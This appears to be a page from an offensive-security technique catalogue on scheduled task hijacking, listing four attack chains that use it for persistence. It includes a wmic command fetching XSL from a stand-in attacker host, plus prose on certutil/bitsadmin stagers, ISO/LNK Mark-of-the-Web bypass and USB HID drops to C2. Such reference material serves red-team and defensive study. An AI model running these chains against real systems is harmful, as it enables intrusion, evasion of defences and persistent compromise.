Scheduled Task Hijack
Writable XML in Tasks folder or a writable target binary — re-points a privileged task to attacker code.
§ Where this technique fits
W-SCHEDTASK-HIJACK is catalogued under the Persistence tactic of the offensive-security kill-chain. It appears in 4 approved dossiers in the registry, at step 5.3 on average.
§ Dossiers chaining this technique
- step 4 / 4: wmic + XSL → AppLocker / SRP bypass
  wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- step 5 / 6: certutil + bitsadmin → AV-friendly stager chain
  Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is Microsoft-signed.
- step 6 / 6: ISO container → LNK → stage from CDN → C2
  Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.
- step 6 / 6: USB drop in parking lot → HID payload → C2
  Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.
§ What commonly comes next
- 01 Application Layer Protocol (T1071 · Command and Control), seen 1×